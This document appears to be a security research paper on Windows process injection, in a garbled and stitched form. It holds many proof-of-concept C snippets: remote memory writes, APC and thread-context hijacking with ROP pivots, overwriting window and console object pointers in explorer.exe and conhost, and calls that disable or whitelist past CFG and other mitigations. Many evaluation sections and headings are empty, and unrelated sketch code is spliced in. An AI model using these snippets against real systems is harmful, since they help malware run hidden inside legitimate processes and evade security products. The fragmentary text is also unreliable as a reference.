Windows Process Injection PDF
Introduction
Process injection in Windows appears to be a well-researched topic, with many techniques now known
and implemented to inject from one process to the other. Process injection is used by malware to gain
more stealth (e.g. run malicious logic in a legitimate process) and to bypass security products (e.g. AV,
DLP and personal firewall solutions) by injecting code that performs sensitive operations (e.g. network
access) to a process which is privileged to do so.
In late 2018, we decided to take a closer look at process injection in Windows. Part of our research
effort was to understand the landscape, with a focus on present-day platforms (Windows 10 x64 1803+,
64-bit processes), and there we came across several problems:
• We could not find a single location with a full list of all injection techniques. There are some
texts that review multiple injection techniques (hat tip to Ashkan Hosseini, EndGame for a nice
collection https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
and to Csaba Fitzl AKA “TheEvilBit” for some
implementations https://github.com/theevilbit/injection), but they’re all very far from capturing
all (or almost all) techniques.
• The texts that describe injection techniques typically lump together “true injection techniques”
(the object of this paper) with other related topics, such as process hollowing and stealthy
process spawning. In this paper, we’re interested only in injection from one 64-bit process
(medium integrity) to another, already running 64-bit process (medium integrity).
• The texts often try to present a complete injection process, therefore mixing writing and
execution techniques, when only one of them is novel.
• Many texts target 32-bit processes, and it was not clear whether they apply to 64-bit processes.
• Many texts target pre-Windows 10 platforms, and it is not clear whether they apply to Windows
10, with its implementation changes and with its new security features.
• Some attacks require privilege elevation, and as such are not interesting.
• The texts that describe process injection lack analysis – discussion of requirements and
limitations, impact of Windows 10 security features, etc.
• The texts usually provide a PoC, but it’s “too well written” – meaning, the PoC checks for return
code, handles errors, handles 32-bit and 64-bit processes, edge conditions, etc. Also, the PoC
implements an end-to-end injection (not just the novel write/execute technique). As such, the
PoC becomes pretty big and difficult to follow.
In this paper, we address all the above issues. We provide the first comprehensive catalogue of true
process injection techniques in Windows. We categorize the individual techniques into write primitives
and execution methods. We test the techniques against 64-bit processes (medium integrity) running on
Windows 10 x64. We test them with and without process protection techniques (CFG, CIG), we analyze
each technique and explain its requirements and limitations. Finally, we provide stripped down,
minimalistic PoC code that works, and at the same time is short enough to clearly show the technique at
hand.
We tried to be as comprehensive as possible, i.e. really cover all different techniques. But of course, this
is a live document, as new techniques will surely be discovered, and as we probably missed a few. We
also tried to give credit to the original inventor of the technique, if we could find one. Again, this is
probably imperfect, and readers are encouraged to send us corrections.
Finally, we get back to our original goal, and describe a new injection technique that inherently bypasses
CFG.
1. Process spawning – these methods create a process instance of a legitimate executable binary,
and typically modify it before the process starts running. Process spawning is very “noisy” and as
such these techniques are suspicious, and not stealthy.
2. Injecting during process initialization – these methods cause processes that are beginning to
run, to load their code (e.g. AppInit DLLs). Typically these techniques require UAC elevation (due
to writing to privileged registry keys and/or privileged folders). Additionally, such methods are
typically mitigated by the Extension Point Disable Policy.
3. Injecting into running processes (“true process injection”) – these are the most interesting
techniques, which are the focus of this paper.
Injecting into running processes typically involves two sub-techniques: preparing memory in the target
process (which contains the payload – the logic to be run, either as native code, or as ROP chain stack),
and executing logic in the target process.
The present time landscape: Windows 10 64-bit (x64), and new security features
In recent years, Windows 10 (and the x64 hardware platform) gained a lot of popularity. This change of
landscape has a great impact on process injection techniques:
- x64 (vs. x86): In Windows x86, all calling conventions except fastcall place all arguments on the
stack. In x64, the calling convention places the first 4 arguments in registers (RCX, RDX, R8 and
R9), and the remaining arguments on stack. This makes it harder to design a payload for x64,
since such payload must control several registers in order to invoke a function. In x86, a payload
just needs to correctly arrange the stack in order for a function invocation to succeed.
Theoretically this could have been elegantly handled by the single byte instruction POPA
(opcode 0x61), which pops all data registers from stack, however this instruction is simply not
available in x64 mode.
- New security features: Windows 10 introduced several new process exploitation mitigation
features, which can be controlled via the SetProcessMitigationPolicy API (from the target
process). These are:
o CFG (Control Flow Guard): this is Microsoft’s implementation of the CFI (Control Flow
Integrity) concept for Windows (8.1, 10). The compiler precedes each indirect CALL/JMP
(CALL/JMP reg) with a call to _guard_check_icall to check the validity of the call target.
Validity is also provided by the compiler as a list of 16-byte aligned valid targets per
module (loaded to memory as a “bitmap” for fast access). Both caller module and callee
module must support CFG in order for it to be in effect.
o Dynamic Code prevention: this feature prevents the calling process from calling
VirtualAlloc with PAGE_EXECUTE_*, MapViewOfFile with the FILE_MAP_EXECUTE option,
VirtualProtect with PAGE_EXECUTE_* etc., and from reconfiguring the CFG bitmap via
SetProcessValidCallTargets (from
https://www.troopers.de/media/filer_public/f6/07/f6076037-85e0-42b7-9a51-507986edafce/the_joy_of_sandbox_mitigations_export.pdf).
Note that for e.g. VirtualProtectEx, the policy enforced is the policy of the caller process.
o Binary Signature Policy (CIG – Code Integrity Guard): only allows modules signed by
Microsoft/Microsoft Store/WHQL to be loaded into the process memory. A weaker
control is Image Load Policy, which can prevent loading modules from remote locations
or files with a low integrity label; this is enforced at the calling process.
o Extension Point Disable Policy: disables “extensions” that load DLLs into the process
space – AppInit DLLs, Winsock LSP, Global Windows Hooks, IMEs (from
https://theryuu.github.io/ifeo-mitigationoptions.txt).
It should be noted that explorer.exe, the classic injection target, as well as several other native
Windows processes/applications (e.g. Edge’s broker processes) are protected with CFG, and the
Edge broker processes are protected almost to the maximum possible level with the above
techniques.
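To make the CFG description above more concrete, the following is a minimal sketch of a validity bitmap with 16-byte granularity. It is a toy model only: the names (toy_cfg_bitmap, toy_cfg_init, toy_cfg_mark_valid, toy_cfg_is_valid), the single-page region and the one-bit-per-slot encoding are assumptions made for illustration, and are not the actual Windows data structures or APIs.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SLOT_SIZE   16u                       /* call targets are tracked per 16-byte slot */
#define REGION_SIZE 4096u                     /* toy region: a single page (assumption) */
#define SLOT_COUNT  (REGION_SIZE / SLOT_SIZE)

/* Toy stand-in for the bitmap: one bit per 16-byte slot of the region. */
typedef struct {
    uint64_t base;                  /* start of the modeled region, assumed 16-byte aligned */
    uint8_t  bits[SLOT_COUNT / 8];  /* 1 = slot holds a valid indirect-call target */
} toy_cfg_bitmap;

void toy_cfg_init(toy_cfg_bitmap *bm, uint64_t base) {
    assert(bm != NULL);
    bm->base = base;
    memset(bm->bits, 0, sizeof bm->bits);     /* nothing is a valid target initially */
}

/* Returns true if the address lies inside the region on a 16-byte boundary. */
bool toy_cfg_in_range_and_aligned(const toy_cfg_bitmap *bm, uint64_t target) {
    if (target < bm->base || target >= bm->base + REGION_SIZE) return false;
    return ((target - bm->base) % SLOT_SIZE) == 0;
}

/* Marks a target as valid; misaligned or out-of-range addresses are refused. */
bool toy_cfg_mark_valid(toy_cfg_bitmap *bm, uint64_t target) {
    assert(bm != NULL);
    if (!toy_cfg_in_range_and_aligned(bm, target)) return false;
    size_t slot = (size_t)((target - bm->base) / SLOT_SIZE);
    bm->bits[slot / 8] |= (uint8_t)(1u << (slot % 8));
    return true;
}

/* The kind of lookup an instrumented indirect call performs before jumping. */
bool toy_cfg_is_valid(const toy_cfg_bitmap *bm, uint64_t target) {
    assert(bm != NULL);
    if (!toy_cfg_in_range_and_aligned(bm, target)) return false;
    size_t slot = (size_t)((target - bm->base) / SLOT_SIZE);
    return ((bm->bits[slot / 8] >> (slot % 8)) & 1u) != 0;
}
```

In this model, an address is accepted only if its slot was explicitly marked, which mirrors why the evaluations in this paper repeatedly ask whether an execution target is "CFG-valid".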
Per the above, our interest is in true process injection techniques for Windows 10 x64. Specifically:
Microsoft provides a standard API (SetProcessValidCallTargets) for “whitelisting” (from CFG perspective)
an arbitrary address in the target process. Tal Liberman from EnSilo described its internal
implementation as a call to ntdll!NtSetInformationVirtualMemory with VmInformationClass=
VmCfgCallTargetInformation (https://blog.ensilo.com/documenting-the-undocumented-adding-cfg-exceptions).
HANDLE p = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION, FALSE,
process_id);
MEMORY_BASIC_INFORMATION meminfo;
VirtualQueryEx(p, target, &meminfo, sizeof(meminfo));
CFG_CALL_TARGET_INFO cfg;
cfg.Offset = ((DWORD64)target) - (DWORD64)meminfo.AllocationBase;
cfg.Flags = CFG_CALL_TARGET_VALID;
SetProcessValidCallTargets(p, meminfo.AllocationBase, meminfo.RegionSize, 1,
&cfg);
We found a simple way to deactivate all other Windows protections (specifically CFG cannot be
deactivated in this manner) for Windows 10 version 1803. Microsoft provides a standard API
(SetProcessMitigationPolicy) for turning on/off these features in the process itself. This function needs
to be run from the target process and provided with 3 arguments – for example,
ProcessDynamicCodePolicy, a pointer to an array of
sizeof(PROCESS_MITIGATION_DYNAMIC_CODE_POLICY) zeros, and the size of the said array – which is
sizeof(PROCESS_MITIGATION_DYNAMIC_CODE_POLICY). Finding an array of zeros is trivial, e.g. the load
image address of ntdll.dll + 0x20. Running a target function with 3 arguments is possible via invoking
ntdll!NtQueueApcThread.
HANDLE th=OpenThread(THREAD_SET_CONTEXT, FALSE, thread_id);
ntdll!NtQueueApcThread(th, SetProcessMitigationPolicy,
(void*)ProcessDynamicCodePolicy, ((char*)GetModuleHandleA("ntdll")) + 0x20,
sizeof(PROCESS_MITIGATION_DYNAMIC_CODE_POLICY));
NOTE: this technique stopped working at Windows 10 version 1809 – once protection is set (by
SetProcessMitigationPolicy), it cannot be unset – SetProcessMitigationPolicy returns status
ERROR_ACCESS_DENIED.
Given that CFG can be turned off by the injecting process, why do we need to analyze for CFG? We
anticipate that the mere act of disabling (or attempting to disable) a security feature by a process may be
monitored, and possibly even prevented, by security products. As such, in the future, injecting processes
may prefer to stay away from this exact functionality. Also, at some point in the future, Microsoft may
disable or restrict CFG manipulation (just like they did with SetProcessMitigationPolicy).
• Memory allocation
• Memory writing (using a memory write primitive)
• Execution
Sometimes the allocation and memory writing are technically carried out in the same step, using the
same API. Sometimes the memory allocation step is implicit, i.e. the memory is pre-allocated.
Sometimes it is impossible to separate memory writing from execution.
Oftentimes, memory allocation and writing are done multiple times before the execution step.
Evaluation Criteria
Memory write primitives:
• Prerequisites
• Limitations
• CFG/CIG-readiness
• Controlled vs. uncontrolled write address
• Stability
Execution methods:
• Prerequisites
• Limitations
• CFG/CIG-readiness
• Control over registers
• Cleanup required
In general, memory writing primitives require the target memory to be allocated. This can happen in
two ways:
1. The injector process can invoke VirtualAllocEx (or NtAllocateVirtualMemory) to allocate new
memory in the target process. In such a case, the injector can request this memory to be
readable and/or writable and/or executable. Note that “the default behavior for executable
pages allocated is to be marked valid call targets for CFG”
(https://docs.microsoft.com/en-us/windows/desktop/Memory/memory-protection-constants).
2. The injector process can designate an existing (allocated) memory within the target process, for
overwriting. There are several options:
a. Stack – either the stack in use, or area beyond the TOS. The stack is RW. Writing to the
stack requires addressing several considerations: (i) when writing beyond TOS, it should
be kept in mind that this area may be overwritten by subsequent calls to inner functions
or system functions; (ii) when writing before TOS, it should be kept in mind that this
overwrites existing stack used
b. Image – the data sections of some DLLs contain “spare” allocation beyond the actual
need of the static variables mapped to there. This “cave” is RW, and initialized with
zeros.
c. Heap – any data object allocated on the heap, whose address is known to the injector
process, can be theoretically used (though the memory area may be modified/recycled
as the object is manipulated or destroyed). Again – RW.
VirtualProtectEx can be used to assign different privileges (e.g. execution) to a memory region.
Note that “the default behavior for VirtualProtect [and VirtualProtectEx] protection change to
executable is to mark all locations as valid call targets for CFG”
(https://docs.microsoft.com/en-us/windows/desktop/Memory/memory-protection-constants).
A notable exception is ntdll!NtMapViewOfSection, which can be invoked in such a way that it allocates
memory for the section in the target process.
Code:
HANDLE h = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE,
process_id);
LPVOID target_payload=VirtualAllocEx(h,NULL,sizeof(payload), MEM_COMMIT |
MEM_RESERVE, PAGE_EXECUTE_READWRITE); // Or any other memory allocation technique
WriteProcessMemory(h, target_payload, payload, sizeof(payload), NULL);
Evaluation:
o Prerequisites: none
o Limitations: none
o CFG/CIG-readiness: not affected
o Controlled vs. uncontrolled write address: address is fully controlled
o Stability: stable
Code:
HANDLE h = OpenProcess(PROCESS_CREATE_THREAD, FALSE, process_id);
CreateRemoteThread(h, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA,
target_DLL_path, 0, NULL);
Evaluation:
o Prerequisites: malicious DLL written to disk, memory write primitive, thread in alertable
state (only when using APC)
o Limitations: DllMain code runs with the loader lock held, hence some restrictions apply
(https://docs.microsoft.com/en-us/windows/desktop/dlls/dynamic-link-library-best-practices)
o CFG/CIG-readiness: CIG prevents loading of non-Microsoft-signed DLLs. An attempt to do
so results in error 0xC0000428 (STATUS_INVALID_IMAGE_HASH – “The hash for image
%hs cannot be found in the system catalogs. The image is likely corrupt or the victim of
tampering.” - https://msdn.microsoft.com/en-us/library/cc704588.aspx)
o Control over registers: none (but typically not a problem due to linking)
o Cleanup required: none
Code:
HANDLE h = OpenProcess(PROCESS_CREATE_THREAD, FALSE, process_id);
CreateRemoteThread(h, NULL, 0, (LPTHREAD_START_ROUTINE) target_execution, RCX, 0,
NULL);
Evaluation:
Code:
HANDLE h = OpenThread(THREAD_SET_CONTEXT, FALSE, thread_id);
QueueUserAPC((LPTHREAD_START_ROUTINE)target_execution, h, RCX);
or
ntdll!NtQueueApcThread(h, (LPTHREAD_START_ROUTINE)target_execution, RCX, RDX, R8);
Evaluation:
o Prerequisites: Target address must be RX (at least). Thread must be in alertable state
o Limitations: none
o CFG/CIG-readiness: target entry point must be CFG-valid.
o Control over registers: RCX (also RDX and R8 if using NtQueueApcThread)
o Cleanup required: none.
Evaluation:
The SetThreadContext anomaly: for some processes, the volatile registers (RAX, RCX, RDX, R8-
R11) are set by SetThreadContext, for other processes (e.g. Explorer, Edge) they are ignored.
It is best not to rely on SetThreadContext to set those registers. Open research question: why does
SetThreadContext behave differently for some processes?
Since there’s no CFG check for SetThreadContext, we can also use ROP gadgets with a non-
executable arbitrary memory (stack). We use a “beyond the TOS” memory cell to store the new
stack address (so as not to modify the original stack).
Code for non-executable memory (ROP-chain):
HANDLE t = OpenThread(THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, FALSE, thread_id);
SuspendThread(t);
CONTEXT ctx;
ctx.Rip = GADGET_pivot; // pop rsp; ret
ctx.Rsp -= 8;
WriteProcessMemory(p, (LPVOID)ctx.Rsp, &new_stack_address, 8, NULL); // Or any other memory write technique
// make sure stack is 16-byte aligned before the return address; make sure there’s
// enough space *below* the entry point for stack used by system calls, etc.
SetThreadContext(t, &ctx);
ResumeThread(t);
// Hijack thread
CONTEXT new_ctx = old_ctx;
new_ctx.Rip = GADGET_pivot;
new_ctx.Rsp -= 8;
WriteProcessMemory(p, (LPVOID)new_ctx.Rsp, &new_stack_address, 8, NULL);
SetThreadContext(t, &new_ctx);
ResumeThread(t);
wait_until_done(t, GADGET_loop);
Code:
HMODULE h = LoadLibraryA(dll_path);
HOOKPROC f = (HOOKPROC)GetProcAddress(h, "GetMsgProc"); // GetMessage hook
SetWindowsHookExA(WH_GETMESSAGE, f, h, thread_id);
PostThreadMessage(thread_id, WM_NULL, NULL, NULL); // trigger the hook
Evaluation:
o Prerequisites: malicious DLL written to disk, target process must have user32.dll loaded
(and a message loop thread)
o Limitations: none
o CFG/CIG-readiness: CIG prevents loading of non-Microsoft-signed DLLs. An attempt to do
so results in error 0xC0000428 (STATUS_INVALID_IMAGE_HASH – “The hash for image
%hs cannot be found in the system catalogs. The image is likely corrupt or the victim of
tampering.” - https://msdn.microsoft.com/en-us/library/cc704588.aspx)
o Control over registers: none (but typically not a problem due to linking)
o Controlled vs. uncontrolled write address: N/A
o Stability: good
o Cleanup required: no
// Write address of GADGET_loop to the target thread stack (used as part of the
// Write Primitive)
CONTEXT new_ctx = old_ctx;
new_ctx.Rsp -= 8+0x58; // use 0x68 in version 1903
new_ctx.Rbx = GADGET_loop;
new_ctx.Rdi = new_ctx.Rsp+0x58; // use 0x68 in version 1903
new_ctx.Rip = GADGET_write;
SetThreadContext(t, &new_ctx);
ResumeThread(t);
wait_until_done(t, GADGET_loop);
Evaluation:
Evaluation:
o Prerequisites: A window belonging to the target process, that uses the extra window
bytes to store a pointer to an object with a virtual function table. Specifically, explorer’s
Shell Tray Window uses the first 8 extra window bytes to store a pointer to a CTray
object. Target address must be RX (at least)
o Limitations: none
o CFG/CIG-readiness: the execution target must be CFG-valid.
o Control over registers: none
o Cleanup required: yes. The original CTray object must be restored, and special
consideration must be given for the return state from the function
Cleanup: save the original CTray object address via GetWindowLongPtr(), restore it into RBX in
the payload, set EAX to 2 and return. Also, restore the original pointer (to the original CTray
object).
Full code (with cleanup and payload write), tailored for Explorer.exe:
HWND hWindow = FindWindowA("Shell_TrayWnd", NULL);
DWORD process_id;
GetWindowThreadProcessId(hWindow, &process_id);
DWORD64 old_obj = GetWindowLongPtrA(hWindow, 0);
HANDLE h = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, false,
process_id);
// Using VirtualAllocEx+WriteProcessMemory to write payload and obj, but other
// memory writing techniques are welcome
LPVOID target_payload = VirtualAllocEx(h, NULL, sizeof(payload), MEM_COMMIT |
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(h, target_payload, payload, sizeof(payload), NULL);
// Make sure payload sets eax=2 and rbx=old_obj before returning control. Also take care of stack
// alignment if calling other functions
DWORD64 new_obj[2];
LPVOID target_obj = VirtualAllocEx(h, NULL, sizeof(new_obj), MEM_COMMIT |
MEM_RESERVE, PAGE_READWRITE);
new_obj[0] = (DWORD64)target_obj + sizeof(DWORD64); //&(new_obj[1])
new_obj[1] = (DWORD64)target_payload;
WriteProcessMemory(h, target_obj, new_obj, sizeof(new_obj), NULL);
SetWindowLongPtrA(hWindow, 0, (DWORD64)target_obj);
SendNotifyMessageA(hWindow, WM_PAINT, 0, 0);
Sleep(1);
SetWindowLongPtrA(hWindow, 0, old_obj);
Code:
HANDLE hm = OpenFileMapping(FILE_MAP_ALL_ACCESS,FALSE,section_name);
BYTE* buf = (BYTE*)MapViewOfFile(hm, FILE_MAP_ALL_ACCESS, 0, 0, section_size);
memcpy(buf+section_size-sizeof(payload), payload, sizeof(payload));
HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE,
process_id);
char* read_buf = new char[sizeof(payload)];
SIZE_T region_size;
for (DWORD64 address = 0; address < 0x00007fffffff0000ull; address += region_size)
{
    MEMORY_BASIC_INFORMATION mem;
    SIZE_T buffer_size = VirtualQueryEx(h, (LPCVOID)address, &mem, sizeof(mem));
    if ((mem.Type == MEM_MAPPED) && (mem.State == MEM_COMMIT) &&
        (mem.Protect == PAGE_READWRITE) && (mem.RegionSize == section_size))
    {
        ReadProcessMemory(h, (LPCVOID)(address + section_size - sizeof(payload)),
            read_buf, sizeof(payload), NULL);
        if (memcmp(read_buf, payload, sizeof(payload)) == 0)
        {
            // the payload is at address + section_size - sizeof(payload);
            …
            break;
        }
    }
    region_size = mem.RegionSize;
}
Evaluation:
Our code handles the problem of consecutive NUL bytes by creating the sequence backwards
using an auxiliary atom of a single arbitrary non-NUL byte. Note that NUL bytes are created first,
and only then the non-NUL bytes are added.
If the payload starts with a NUL byte, it is still possible to write it by artificially prepending it with
at least one non-NUL byte (not shown in the code)
NOTE: the original atom bombing PoC did not directly address the issue of consecutive NUL
bytes. Instead, it assumed that the target memory is 0-filled (which is indeed the case for the
.data slack used by the original PoC).
The code below ignores the issue of maximum atom length (RTL_MAXIMUM_ATOM_LENGTH –
probably 255). Longer payloads need to be broken into chunks of up to 255 bytes.
Code:
HANDLE th = OpenThread(THREAD_SET_CONTEXT| THREAD_QUERY_INFORMATION, FALSE,
thread_id);
for (char* pos = payload; pos < (payload + sizeof(payload)); pos += strlen(pos)+1)
{
    if (*pos == '\0')
    {
        continue;
    }
    ATOM a = GlobalAddAtomA(pos);
    DWORD64 offset = pos - payload;
    ntdll!NtQueueApcThread(th, GlobalGetAtomNameA, (PVOID)a,
        (PVOID)(((DWORD64)target_payload) + offset), (PVOID)(strlen(pos)+1));
}
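The loop above treats the buffer as a sequence of NUL-terminated segments, and the text notes that long segments would have to be broken into chunks of up to 255 bytes. The following is a small, portable sketch of just that segmentation step, with no Windows calls. The names (chunk, next_chunk, count_chunks) and the MAX_CHUNK constant are hypothetical, and the 255-byte cap is taken from the "probably 255" estimate above rather than from a verified limit. Unlike the strlen-based loop, this sketch is bounded by an explicit buffer size.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_CHUNK 255u  /* assumed cap, mirroring the "probably 255" estimate in the text */

typedef struct {
    size_t offset;  /* where the chunk starts inside the buffer */
    size_t length;  /* number of non-NUL bytes in the chunk (1..MAX_CHUNK) */
} chunk;

/* Finds the next run of non-NUL bytes at or after *pos, capped at MAX_CHUNK bytes.
   Returns 1 and advances *pos past the chunk, or 0 when only NUL bytes (or nothing) remain. */
int next_chunk(const unsigned char *buf, size_t size, size_t *pos, chunk *out) {
    assert(buf != NULL && pos != NULL && out != NULL);
    size_t i = *pos;
    while (i < size && buf[i] == 0) i++;          /* skip over NUL bytes */
    if (i >= size) { *pos = size; return 0; }
    size_t start = i;
    while (i < size && buf[i] != 0 && (i - start) < MAX_CHUNK) i++;
    out->offset = start;
    out->length = i - start;
    *pos = i;
    return 1;
}

/* Counts how many chunks a buffer splits into under the rules above. */
size_t count_chunks(const unsigned char *buf, size_t size) {
    size_t pos = 0, n = 0;
    chunk c;
    while (next_chunk(buf, size, &pos, &c)) n++;
    return n;
}
```

For example, a 600-byte buffer with no NUL bytes splits into three chunks (255, 255 and 90 bytes), while runs of NUL bytes between segments are simply skipped.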
Evaluation:
Code:
HANDLE fm = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE,
0, sizeof(payload), NULL);
LPVOID map_addr =MapViewOfFile(fm, FILE_MAP_ALL_ACCESS, 0, 0, 0);
HANDLE p = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE,
process_id);
memcpy(map_addr, payload, sizeof(payload));
LPVOID requested_target_payload=0;
SIZE_T view_size=0;
ntdll!NtMapViewOfSection(fm, p, &requested_target_payload, 0, sizeof(payload),
NULL, &view_size, ViewUnmap, 0, PAGE_EXECUTE_READWRITE );
target_payload=requested_target_payload;
Evaluation:
o Prerequisites: none
o Limitations: cannot write to allocated memory
o CFG/CIG-readiness: not affected
o Controlled vs. uncontrolled write address: address is fully controlled, but cannot be used
to write to an allocated memory. So it’s better to let Windows choose the address.
o Stability: good
Evaluation:
ntdll!NtResumeProcess(p);
Evaluation:
Evaluation:
o Prerequisites: The target process must own a window. The target address must be RX
(at least)
o Limitations: none
o CFG/CIG-readiness: the target execution address must be CFG-valid.
o Control over registers: none
o Cleanup required: yes. The original kernel callback table must be restored.
INPUT ip;
ip.type = INPUT_KEYBOARD;
ip.ki.wScan = 0;
ip.ki.time = 0;
ip.ki.dwExtraInfo = 0;
ip.ki.wVk = VK_CONTROL;
ip.ki.dwFlags = 0; // 0 for key press
SendInput(1, &ip, sizeof(INPUT));
Sleep(100);
PostMessageA(hWindow, WM_KEYDOWN, 'C', 0); // hWindow is a handle to the application window
Evaluation:
Cleanup code:
// release the Ctrl key
Sleep(100);
ip.type = INPUT_KEYBOARD;
ip.ki.wScan = 0;
ip.ki.time = 0;
ip.ki.dwExtraInfo = 0;
ip.ki.wVk = VK_CONTROL;
ip.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1, &ip, sizeof(INPUT));
Code:
DWORD conhost_id = conhostId(process_id);
HANDLE hp = OpenProcess(PROCESS_VM_READ|PROCESS_VM_WRITE | PROCESS_VM_OPERATION,
FALSE, conhost_id);
LPVOID target_payload = VirtualAllocEx(hp, NULL, sizeof(payload), MEM_COMMIT |
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hp, target_payload, payload, sizeof(payload), NULL);
LONG_PTR udptr = GetWindowLongPtr(hWindow, GWLP_USERDATA);
ULONG_PTR vTable;
ReadProcessMemory(hp, (LPVOID)udptr, (LPVOID)&vTable, sizeof(ULONG_PTR), NULL);
ConsoleWindow cw;
ReadProcessMemory(hp, (LPVOID)vTable, (LPVOID)&cw, sizeof(ConsoleWindow), NULL);
LPVOID target_cw = VirtualAllocEx(hp, NULL, sizeof(ConsoleWindow), MEM_COMMIT |
MEM_RESERVE, PAGE_READWRITE);
cw.GetWindowHandle = (ULONG_PTR)target_payload;
WriteProcessMemory(hp, target_cw, &cw, sizeof(ConsoleWindow), NULL);
WriteProcessMemory(hp, (LPVOID)udptr, &target_cw, sizeof(ULONG_PTR), NULL);
SendMessage(hWindow, WM_SETFOCUS, 0, 0);
WriteProcessMemory(hp, (LPVOID)udptr, &vTable, sizeof(ULONG_PTR), NULL);
NOTE: the process_id provided must have conhost.exe as its child (so when the application is
run from a command line, process_id must belong to the cmd.exe process). hWindow is a
window belonging to the process whose ID is process_id.
Evaluation:
a. Search for an (undocumented) ALPC control data structure that contains a callback.
b. Memory writing primitive is used to overwrite the callback address
c. The injecting process enumerates over all ports and attempts to connect to each one in
order to trigger the callback.
NOTE: in Windows 10 version 1903 the ALPC port is 46 (as opposed to 45 in earlier versions).
Evaluation:
o Prerequisites: process uses ALPC ports, target address must be RX (at least)
o Limitations: none
o CFG/CIG-readiness: the target execution address must be CFG-valid.
o Control over registers: none
o Cleanup required: yes. The original callback needs to be restored.
Evaluation:
Note that the 5 alertable functions call NtXXX functions which are simple wrappers around
SYSCALL (SleepEx -> NtDelayExecution, WaitForSingleObjectEx -> NtWaitForSingleObject,
WaitForMultipleObjectsEx -> NtWaitForMultipleObjects, SignalObjectAndWait ->
NtSignalAndWaitForSingleObject, RealMsgWaitForMultipleObjectsEx ->
NtUserMsgWaitForMultipleObjectsEx). These five NtXXX functions use the following template:
mov r10,rcx
mov eax,SERVICE_DESCRIPTOR
test byte ptr [SharedUserData+0x308],1
jne +3
syscall
ret
int 2E
ret
These functions don’t use the stack, so the TOS (the QWORD at RSP) contains the return address, hence
we know exactly where to place the ROP chain.
We can generalize this – knowing RIP usually allows us to determine where the return address
is, relative to RSP. The above case becomes a special case wherein the return address offset
relative to RSP is 0 (when RIP is NtXXX+0x14 for the five NtXXX functions named above).
Naïve code:
HANDLE ntdll= GetModuleHandleA("ntdll");
HANDLE t = OpenThread(THREAD_SET_CONTEXT | THREAD_GET_CONTEXT |
THREAD_SUSPEND_RESUME, FALSE, thread_id);
SuspendThread(t);
CONTEXT ctx;
ctx.ContextFlags = CONTEXT_ALL;
GetThreadContext(t, &ctx);
DWORD64 tos = (DWORD64)ctx.Rsp;
Of course, this technique ruins the current stack, so there’s no way to resume the original
thread flow. There are several alternatives:
• Back up the current stack first (using memmove), then restore it and the registers. Note:
in order to accommodate the backup stack, the stack can be grown by writing a dummy
value every 4KB (allocating a new page each time).
• Alternatively, the stack can be read by the injector process, using a memory read
primitive (e.g. ReadProcessMemory), and embedded in the payload.
• Pivot to a new memory immediately – this ruins only the return address, and another
QWORD above it (which is anyway reserved for the leaf function and unused by the 5
leaf functions mentioned above, hence can be safely overwritten with no need for
restoration). The payload needs to restore RSP and the return address (only).
As for restoring registers, the 5 leaf functions do not rely on volatile registers when transferring
control to the kernel, and thus it is safe to modify the volatile registers, but the non-volatile
registers must be restored. Keep in mind that calling other (system) functions from the payload
does not modify the non-volatile registers since they are restored before control is returned to
the main payload. Thus, if the payload is written to only use volatile registers, it will be safe
(with no need to restore registers).
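The rule of thumb above (a payload that only writes volatile registers needs no register restoration) can be expressed as a small check. This is an illustrative sketch only: the helper names (is_volatile, needs_restore) are hypothetical, and the register list is the volatile integer set named earlier in this paper (RAX, RCX, RDX, R8-R11).

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Volatile integer registers, as listed in this paper: RAX, RCX, RDX, R8-R11. */
static const char *const VOLATILE_REGS[] = {
    "RAX", "RCX", "RDX", "R8", "R9", "R10", "R11"
};

/* Returns true if the (upper-case) register name is in the volatile set. */
bool is_volatile(const char *reg) {
    assert(reg != NULL);
    for (size_t i = 0; i < sizeof VOLATILE_REGS / sizeof VOLATILE_REGS[0]; i++) {
        if (strcmp(reg, VOLATILE_REGS[i]) == 0) return true;
    }
    return false;
}

/* Returns true if any register in the list is non-volatile, i.e. the code that
   writes these registers would have to save and restore at least one of them. */
bool needs_restore(const char *const *written, size_t count) {
    for (size_t i = 0; i < count; i++) {
        if (!is_volatile(written[i])) return true;
    }
    return false;
}
```

For instance, code that writes only RAX and R10 needs no restoration under this rule, whereas code that also writes RDI or RBX does.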
// payload mustn’t modify non-volatile registers, must copy the saved return
// address to the original tos location (e.g. using memmove)
// and must restore rsp and control when it’s done, e.g. using GADGET_pivot.
HANDLE t = OpenThread(THREAD_SET_CONTEXT | THREAD_GET_CONTEXT |
    THREAD_SUSPEND_RESUME, FALSE, thread_id);
SuspendThread(t);
CONTEXT context;
context.ContextFlags = CONTEXT_ALL;
GetThreadContext(t, &context);
DWORD64 orig_tos = (DWORD64)context.Rsp;
DWORD64 tos = orig_tos-0x2000; // 0x2000 experimentally works…
// overwrite the original tos+8 with the new tos address (we don't need to restore
// this since it's shadow stack and not used by the leaf function!)
for (int i = 0; i < sizeof(tos); i++)
{
    (*NtQueueApcThread)(t, GetProcAddress(ntdll, "memset"), (void*)(orig_tos +
        8 + i), (void*)(((BYTE*)&tos)[i]), 1);
}
ResumeThread(t);
Evaluation:
• Prerequisites: Thread must be in alertable state. Target address must be RX (at least)
• Limitations: none
• CFG/CIG-readiness: not affected.
• Control over registers: no
• Stability: since all memory writes are queued, and happen together, atomicity is not an
issue.
• Cleanup required: yes. The original thread state, stack and non-volatile registers need to
be restored.
Shatter-like Techniques
Summary of Techniques
Memory Allocation
Memory Write
Execution Techniques
Auxiliary technique
During our research, we discovered an auxiliary technique that can be helpful for future injection attack
development. This technique loads a system DLL into the target process, without writing its path to the
process.
